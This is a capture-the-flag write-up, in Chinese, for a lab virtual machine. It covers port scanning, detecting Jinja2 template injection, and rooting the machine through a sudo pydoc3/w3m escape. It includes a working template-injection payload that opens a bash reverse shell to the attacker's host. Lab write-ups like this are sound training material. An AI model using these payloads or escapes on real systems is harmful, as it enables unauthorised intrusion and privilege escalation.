TheHackersLabs-Caldo de Avecren靶机详解WP

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.155  08:00:27:5e:6d:36       (Unknown)
192.168.60.254  00:50:56:e0:e6:12       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.985 seconds (128.97 hosts/sec). 4 responded
❯ export ip=192.168.60.155
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.155:22
Open 192.168.60.155:80
Open 192.168.60.155:8089
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 21:48 CST
Initiating ARP Ping Scan at 21:48
Scanning 192.168.60.155 [1 port]
Completed ARP Ping Scan at 21:48, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:48
Completed Parallel DNS resolution of 1 host. at 21:48, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:48
Scanning 192.168.60.155 [3 ports]
Discovered open port 22/tcp on 192.168.60.155
Discovered open port 8089/tcp on 192.168.60.155
Discovered open port 80/tcp on 192.168.60.155
Completed SYN Stealth Scan at 21:48, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.155
Host is up, received arp-response (0.00051s latency).
Scanned at 2025-01-16 21:48:18 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
8089/tcp open  unknown syn-ack ttl 64
MAC Address: 08:00:27:5E:6D:36 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

80端口没有有价值的信息，默认的Apache的页面

换到8089端口

SSTI注入

发现存在SSTI注入，具体参考TheHackersLabs-SinPlomo98靶机详解WP | Pepster’Blog

可以用tinga扫一下是什么类型的

❯ ./tinja url -u http://192.168.60.155:8089/\?user\=123
TInjA v1.1.4 started at 2025-01-16_22-00-43

Analyzing URL(1/1): http://192.168.60.155:8089/?user=123
===============================================================
Status code 200
Analyzing query parameter  user  =>  [123]
[*] Value  FTF3ZMH72S7PZFFM  of query parameter  user  is being reflected 1 time(s) in the response body

[!] The polyglot <%'${{/#{@}}%>{{ triggered an error: Status Code 500
[!] The polyglot p ">[[${{1}}]] was rendered in a modified way: [p ">[[$1]]]
[*] The polyglot p ">[[${{1}}]] returned the response(s) [p ">[[$1]]]
[*] The polyglot <%=1%>@*#{1} returned the response(s) [unmodified]
[!] The polyglot {##}/*{{.}}*/ triggered an error: Status Code 500

A template injection was detected and the template engine is now being identified.
[!] The polyglot <%${{#{%>}} triggered an error: Status Code 500
[!] The polyglot {{/}} triggered an error: Status Code 500
[!] The polyglot {#${{1}}#}} was rendered in a modified way: [}]
[*] The polyglot {#${{1}}#}} returned the response(s) [}]
[!] The polyglot {{1in[1]}} was rendered in a modified way: [True]
[*] The polyglot {{1in[1]}} returned the response(s) [True]
[!] The polyglot <%=1%>#{2}{{a}} was rendered in a modified way: [<%=1%>#{2}]
[*] The polyglot <%=1%>#{2}{{a}} returned the response(s) [<%=1%>#{2}]

Verifying the template injection by issuing template expressions tailored to the specific template engine.
[*] Verifying Jinja2/Jinja2 (Sandbox).
[*] The polyglot {{ 7*7 }} returned the response(s) [49]
[+] Jinja2/Jinja2 (Sandbox) was identified (certainty: Very High)

===============================================================

Successfully finished the scan
[+] Suspected template injections: 1
[+] 1 Very High, 0 High, 0 Medium, 0 Low, 0 Very Low certainty

Duration: 103.00628ms
Average polyglots sent per user input: 9

可以成功读取文件，不过需要先进行url编码

所以我还是建议去浏览器上发送，不用burpsuite

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c \'bash -i >& /dev/tcp/192.168.60.100/1234 0>&1\'').read() }}

用户提权

成功拿到shell了

❯ pwncat-cs -lp 1234
[22:12:42] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[22:12:45] received connection from 192.168.60.155:52584                                                                                    bind.py:84
[22:12:45] 0.0.0.0:1234: normalizing shell path                                                                                         manager.py:957
[22:12:46] 192.168.60.155:52584: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) caldo@CaldoPollo:/home/caldo$ ls
user.txt
(remote) caldo@CaldoPollo:/home/caldo$ cat user.txt
f3e431cd1129e9879e482fcb2cc151e8

Root提权

用户拥有sudo权限

(remote) caldo@CaldoPollo:/home/caldo$ sudo -l
Matching Defaults entries for caldo on CaldoPollo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User caldo may run the following commands on CaldoPollo:
    (root) NOPASSWD: /usr/bin/pydoc3
(remote) caldo@CaldoPollo:/home/caldo$ sudo /usr/bin/pydoc3 --help
pydoc - the Python documentation tool

pydoc3 <name> ...
    Show text documentation on something.  <name> may be the name of a
    Python keyword, topic, function, module, or package, or a dotted
    reference to a class or function within a module or module in a
    package.  If <name> contains a '/', it is used as the path to a
    Python source file to document. If name is 'keywords', 'topics',
    or 'modules', a listing of these things is displayed.

pydoc3 -k <keyword>
    Search for a keyword in the synopsis lines of all available modules.

pydoc3 -n <hostname>
    Start an HTTP server with the given hostname (default: localhost).

pydoc3 -p <port>
    Start an HTTP server on the given port on the local machine.  Port
    number 0 can be used to get an arbitrary unused port.

pydoc3 -b
    Start an HTTP server on an arbitrary unused port and open a web browser
    to interactively browse documentation.  This option can be used in
    combination with -n and/or -p.

pydoc3 -w <name> ...
    Write out the HTML documentation for a module to a file in the current
    directory.  If <name> contains a '/', it is treated as a filename; if
    it names a directory, documentation is written for all the contents.

pydoc3 是一个命令行工具，用于查看 Python 3 的文档。它是 Python 3 的文档生成和查看工具，类似于 pydoc，但专门为 Python 3 版本设计。

这个工具可以生成html文档，不过这个工具会在浏览的时候会调用w3m浏览网页的文本模式浏览器

可以利用w3m提权

(remote) caldo@CaldoPollo:/home/caldo$ sudo /usr/bin/pydoc3 -b 1234
Can't open history
Server ready at http://localhost:43691/
Server commands: [b]rowser, [q]uit
server>
# 输入q进入w3m浏览器
#输入!/bin/bash即可
root@CaldoPollo:/home/caldo# id
uid=0(root) gid=0(root) grupos=0(root)
root@CaldoPollo:/home/caldo# cat /root/root.txt
44df858281024b69291f503f8921136c